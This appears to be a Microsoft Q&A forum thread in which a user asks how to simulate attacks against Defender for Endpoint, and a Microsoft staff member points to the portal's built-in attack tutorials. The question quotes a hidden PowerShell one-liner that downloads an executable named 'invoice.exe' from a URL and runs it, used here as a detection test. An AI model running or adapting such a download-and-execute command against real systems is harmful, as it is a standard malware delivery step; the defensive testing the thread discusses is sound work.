Simulating attacks for Defender For Endpoint

Bombbe 1,611 Reputation points
2022-10-28T12:21:28.24+00:00

Hi,
we have onboarded our Windows servers to the Defender For endpoint I was wonder test attacks or similar that I could perform?

I know there are this one but are the more things that I could also test e.g creating new administrator accounts e.g?

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'  
Microsoft Defender for Cloud
Microsoft Defender for Cloud
An Azure service that provides threat protection for workloads running in Azure, on-premises, and in other clouds. Previously known as Azure Security Center and Azure Defender.
1,236 questions
0 comments No comments
{count} votes

Accepted answer
  1. Givary-MSFT 29,351 Reputation points Microsoft Employee
    2022-10-28T12:48:05.067+00:00

    @Bombbe Thank you for reaching out to us. You can refer to this Attack tutorials & simulations for Microsoft 365 Defender for Endpoint at
    https://security.microsoft.com/tutorials/simulations

    Refer to this section within defender for endpoint portal for tutorials and simulations.

    255110-image.png

    Reference: https://learn.microsoft.com/en-us/microsoft-365/security/defender/eval-defender-investigate-respond-simulate-attack?view=o365-worldwide#:~:text=post%2Dincident%20review.-,Simulate%20attacks%20with%20the%20Microsoft%20365%20Defender%20portal,-The%20Microsoft%20365

    Let me know if you have any further questions.


0 additional answers

Sort by: Most helpful